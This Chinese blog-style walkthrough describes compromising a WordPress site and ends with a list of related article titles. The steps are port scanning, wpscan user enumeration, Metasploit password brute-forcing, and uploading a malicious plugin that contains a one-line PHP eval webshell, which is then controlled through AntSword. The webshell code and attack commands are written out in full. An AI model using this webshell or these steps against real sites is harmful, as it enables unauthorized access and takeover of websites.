条件:

本地机在10.xx

Kali也在10.xx 且能联网

蚁剑工具

Nmap进行扫描端口,发现只有80端口开放

使用wpscan工具,进行扫描

wpscan --url https://www.xxxxxxx.wiki/ --enumerate u

扫描指定用户

发现有几个用户

用msf对这几个用户进行密码爆破

得出登陆密码

登陆进入192.168.10.40

利用插件漏洞,进行渗透

下载插件

下载后解压,把一句话木马放入

Yjh.php

<?php

@eval($_POST[shell]);

?>

然后把该文件夹压缩为zip格式,上传插件

之后打开蚁剑

输入url地址为下

输入一句话密码,添加成功

即获取网站shell

渗透wordpress过程相关推荐

  1. 记一次用WPScan辅助渗透WordPress站点

    记一次用WPScan辅助渗透WordPress站点 一.什么是WPScan? WPScan 是一个扫描 WordPress 漏洞的黑盒子扫描器,它可以为所有 Web 开发人员扫描 WordPress ...

  2. cs linux内网渗透,记一次利用cs进行内网渗透的过程

    记一次利用cs进行内网渗透的过程 ​首先搭建好cs的服务端和客户端连接,下面正式进行渗透 环境 kali:192.168.0.226 域控机:192.168.0.138 成员机:192.168.0.2 ...

  3. 关于网络渗透的过程以及感想记录

    12.28 这个网站是我很早之前就想攻下的,经历大概如下: 1.想借着ctf的劲头去看看此网站,但是失败,原因是,ctf跟实战完全是两码子事儿啊!此网站的情况比较复杂,大部分是静态页面也就是html, ...

  4. Vulnhub靶机:DC-7渗透详细过程

    DC-7 前言提要 这个靶机有用到社工~,还是蛮有趣的 靶场地址:https://www.vulnhub.com/entry/dc-7,356/ DC-7是一个中级的靶场,需要具备以下前置知识: 基础 ...

  5. Vulnhub靶机:DC-8渗透详细过程

    DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测 ...

  6. Vulnhub靶机:DC-3渗透详细过程

    前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试 ...

  7. 记录一次vuln靶场的渗透过程---driftingblues9

    记录一次渗透的过程 目录 一.信息收集 二.发现漏洞 三.权限提升 总结 一.信息收集 1.使用nmap扫描网段,发现存活主机,以及开放的端口 nmap -v 192.168.216.0/24 192 ...

  8. 红队渗透靶场之W1R3S靶场(超详细!)

    W1R3S考察知识 nmap的基本使用 目录爆破工具的使用 CMS漏洞的利用 Linux用户的简单提权 W1R3S靶场搭建 W1R3S靶场下载地址: https://download.vulnhub. ...

  9. metasploit 利用MS08-067渗透攻击xp系统全过程

    工具:metasploit,目标系统 windows xp sp3 English 渗透攻击过程  1.search MS08-067  2. use  exploit/windows/smb/ms0 ...

最新文章

  1. Python,OpenCV轮廓属性、轮廓检测及绘制
  2. RTL Schematic 与 Technology Schematic的区别?
  3. codeforces1454 F. Array Partition
  4. 代码走查和代码审查_如何避免代码审查陷阱降低生产率
  5. MongoDB数据建模介绍
  6. 如何检测支付宝接口中notify_url.php有没有返回,微信小程序支付成功,但是notify_url接收不到回调如何排查此问题?...
  7. .Net core 应用程序发布Web时,有些文件夹没有发布成功解决办法
  8. Ubuntu安装搜狗输入法只需四步
  9. ofbiz碰到问题收集
  10. qtp11安装及入门
  11. 淘宝客APP源码/社交电商自营商城源码/前端基于Uniapp开发
  12. 最全的Android源码目录结构详解【转】
  13. 机器学习知识点整理(《机器学习》——周志华)
  14. 架构师主要做些什么,你知道吗?
  15. w10桌面计算机图标箭头去除,如何让win10桌面图标箭头取消除 笔记本电脑去掉快捷小箭头软件-♚付涛纪实阁♚...
  16. 有信仰与无信仰家族200年对比,让世人震惊!!
  17. 1.CDC绘图。包括加载图片,消去图片,设置图片一部分透明,不闪烁方式。
  18. 移动端布局三种视口_移动H5的meta视口标签、弹性布局原则和背景图片适配
  19. arm裸机与嵌入式linux驱动开发,如何编写基于ARM的裸机程序和基于Linux的驱动程序?...
  20. 利用CANoe Vector LDF Explorer Pro创建LDF文件

热门文章

  1. 堡垒机是服务器吗?两者有区别吗?
  2. matlab 模拟风,matlab谐波合成法的脉动风模拟
  3. 亚马逊s3存储: aws cli上传工具速度和各文件大小关系探究
  4. Redhat Linux 2.6.18-308.el5修改系统时间
  5. 三态门三个状态vhdl_基本逻辑门和三态门实验报告.docx
  6. 时间转换(秒数转时分秒,时间戳转年月日)
  7. 直播带货app源码+搭建教程
  8. 电容充放电时间计算方法(指数衰减脉冲) 附C代码模拟实现
  9. [4G5G专题-1]:专题导读
  10. srsRAN on PlutoSDR(一)